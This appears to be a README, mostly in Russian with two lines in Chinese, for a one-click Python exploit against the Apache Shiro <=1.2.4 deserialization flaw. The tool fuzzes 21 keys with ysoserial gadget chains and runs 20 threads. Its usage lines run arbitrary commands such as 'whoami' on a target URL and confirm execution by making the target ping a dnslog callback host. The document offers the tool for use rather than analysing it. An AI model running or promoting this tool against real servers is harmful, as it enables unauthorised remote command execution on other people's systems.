
shiro 1.2.47 десериализация
Десериализация Shiro<=1.2.4, инструмент для обнаружения в один клик
改动内容:1.新增4个利用链模块(CommonsCollections7-10),预计增加成功率30%,已打包成新ysoserial的jar包,请勿更换
改动内容:2.增加多线程,虽模块增加但速度却提高300%
集成21个key进行fuzz
Если помогло, пожалуйста, поставьте звезду. Статья в блоге: http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
Использование:python3 shiro.py url command
Использование:python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ для проверки рекомендуется использовать эту платформу dnslog, она намного быстрее, чем ceye.io
Если в выполняемой команде есть пробелы, не забудьте заключить её в кавычки ""
использование:python3 shiro.py http://url.com "ping dnslog.cn"
Прогоните все 11 модулей, затем зайдите на платформу dnslog и проверьте, был ли получен запрос. Не появился — GG, возможно, кодировок ещё недостаточно
Соберите кодировки самостоятельно, просто добавьте методы в исходный код в каталоге moule
Чтобы упростить работу скрипта, количество потоков не задаётся пользователем, по умолчанию — 20 потоков. Если нужно изменить, отредактируйте параметр, управляющий потоками, в строке 20 файла /moule/main.py